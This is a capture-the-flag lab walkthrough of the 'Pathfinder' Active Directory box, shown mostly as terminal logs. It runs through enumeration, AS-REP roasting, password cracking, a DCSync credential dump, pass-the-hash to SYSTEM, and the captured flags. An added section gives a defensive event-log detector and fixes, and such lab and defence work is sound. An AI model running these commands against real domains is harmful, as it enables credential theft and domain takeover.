Pathfinder

$ nmap -p- -T4 -A 10.10.10.30
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-01 06:36:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

BloodHound
https://github.com/fox-it/BloodHound.py
$ pip install bloodhound
$ ~/.local/bin/bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
INFO: Found AD domain: megacorp.local
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: Pathfinder.MEGACORP.LOCAL
INFO: Found 5 users
INFO: Connecting to GC LDAP server: pathfinder.megacorp.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Pathfinder.MEGACORP.LOCAL
INFO: Done in 00M 17S

apt install neo4j
apt install bloodhound

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ sudo neo4j console

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ bloodhound --no-sandbox

In BloodHound, run the built-in queries "Shortest Paths to High Value Targets" and "Find Principals with DCSync Rights".
The second query shows that svc_bes has the GetChangesAll privilege on the domain, which is the edge BloodHound flags as DCSync rights.

AS-REP Roasting
https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
kali@kali:~/0.htb/Starting_Point/Pathfinder30$ /usr/local/bin/GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:505dbb28aca9bd62df1c66792f6495b1$72efea37fa8a8aba1260c1804c1d2d1a35ef0a40507853e5de0b563fe9033f3b7e1d3c1b0b7b619c7d3c0691ba6daccbb5ee70c40495214c7dffb6f39a10fd027aad5e54cb38782e110784191a948845ef6bb9a1380baa8dc0ffbde2ce406b15406fda11dc4403abe8aefd787c58272408b836140ca8babef0bedd06cb8bb74e8e6bb77b3a4c51ec33746c105e622bc0fa71adab0e980b5834d679558f2144df7211a27daab7b5a271c96b66aa5f116af94d2104911a6a63ba53bc433ea020c57bfdb26d733890be4e0060ef21c69fb1edcdc888daf367c781dcc31945f4cfd107129a53aa63921a6f6464424ff62a58
kali@kali:~/0.htb/Starting_Point/Pathfinder30$ 

Save the AS-REP hash obtained for svc_bes (the $krb5asrep$ line above) to hash.txt.

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:10 DONE (2021-05-04 14:11) 0.09823g/s 1041Kp/s 1041Kc/s 1041KC/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ gem install evil-winrm
kali@kali:~/0.htb/Starting_Point/Pathfinder30$ evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> dir
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir


    Directory: C:\Users\svc_bes\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:35 PM             32 user.txt


*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05fb166688a8603d970c6d033f637f1
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> 

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ /usr/local/bin/secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:d74efe6aed160c594374f66c68dc0e98:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:489a219f9303e4a735935f003789947e9efd70a5f671738c5232738461a22a44
PATHFINDER$:aes128-cts-hmac-sha1-96:96a292de9bf471e1b5950adaa7381254
PATHFINDER$:des-cbc-md5:8a389e0b4ac8a404
[*] Cleaning up... 
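From the defender's side, both steps of this box leave distinct traces on the domain controller: the AS-REP roast of svc_bes appears as a 4768 TGT request without pre-authentication, and the secretsdump run above appears as 4662 events in which a non-DC account exercises the replication control-access rights. The following detector is an added example, not part of the original walkthrough; the event records are constructed for it, the field names follow the XML event data of Event IDs 4768 and 4662, and the set of DC account names passed to it is assumed.

```python
# Added example (not from the original walkthrough): flag AS-REP roasting and
# DCSync from constructed Windows Security event records.

# Control-access right GUIDs whose use in a 4662 event indicates a replication request.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def flag_asrep_roast(ev):
    """4768: a TGT issued to a user account that needed no pre-authentication
    (PreAuthType 0) with an RC4 ticket (0x17), as GetNPUsers.py -request produces."""
    return (ev.get("EventID") == 4768
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType", "").lower() == "0x17"
            and not ev.get("TargetUserName", "").endswith("$"))

def flag_dcsync(ev, dc_accounts):
    """4662: a replication right (Control Access, mask 0x100) exercised by an
    account that is not a domain controller. dc_accounts holds upper-case names."""
    if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
        return False
    if ev.get("SubjectUserName", "").upper() in dc_accounts:
        return False
    props = ev.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_RIGHTS)

def scan(events, dc_accounts):
    """Return (technique, account) pairs for every suspicious event, in order."""
    hits = []
    for ev in events:
        if flag_asrep_roast(ev):
            hits.append(("AS-REP roasting", ev["TargetUserName"]))
        elif flag_dcsync(ev, dc_accounts):
            hits.append(("DCSync", ev["SubjectUserName"]))
    return hits

# Constructed sample events modelled on this box: svc_bes roasted, sandra logging on
# normally, the DC replicating legitimately, then svc_bes replicating (the DCSync).
SAMPLE_EVENTS = [
    {"EventID": 4768, "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "TargetUserName": "svc_bes"},
    {"EventID": 4768, "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12",
     "TargetUserName": "sandra"},
    {"EventID": 4662, "AccessMask": "0x100", "SubjectUserName": "PATHFINDER$",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "AccessMask": "0x100", "SubjectUserName": "svc_bes",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for technique, account in scan(SAMPLE_EVENTS, {"PATHFINDER$"}):
        print(f"{technique}: {account}")
```

The same two checks also point at the fixes: clear DONT_REQ_PREAUTH on svc_bes so 4768 events with PreAuthType 0 stop appearing, and remove the replication rights from the domain object's ACL so only DC accounts ever trigger the 4662 match.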

kali@kali:~/0.htb/Starting_Point/Pathfinder30$ psexec.py megacorp.local/administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[*] Found writable share ADMIN$
[*] Uploading file fzShXuaQ.exe
[*] Opening SVCManager on 10.10.10.30.....
[*] Creating service OPLG on 10.10.10.30.....
[*] Starting service OPLG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BEDE-E51D

 Directory of C:\Users\Administrator\Desktop

02/25/2020  03:33 PM    <DIR>          .
02/25/2020  03:33 PM    <DIR>          ..
02/25/2020  03:33 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  13,213,958,144 bytes free

C:\Users\Administrator\Desktop>type root.txt
ee613b2d048303e5fd4ac6647d944645
C:\Users\Administrator\Desktop>